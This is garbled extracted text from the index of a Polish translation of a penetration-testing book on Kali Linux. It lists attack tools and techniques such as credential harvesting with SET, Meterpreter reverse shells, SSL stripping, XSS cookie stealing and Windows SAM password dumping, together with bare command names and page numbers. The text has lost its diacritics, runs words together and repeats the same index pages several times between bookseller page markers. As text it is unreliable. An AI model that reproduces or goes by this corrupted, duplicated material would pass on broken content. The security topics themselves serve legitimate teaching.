142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 52: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 53: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 54: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

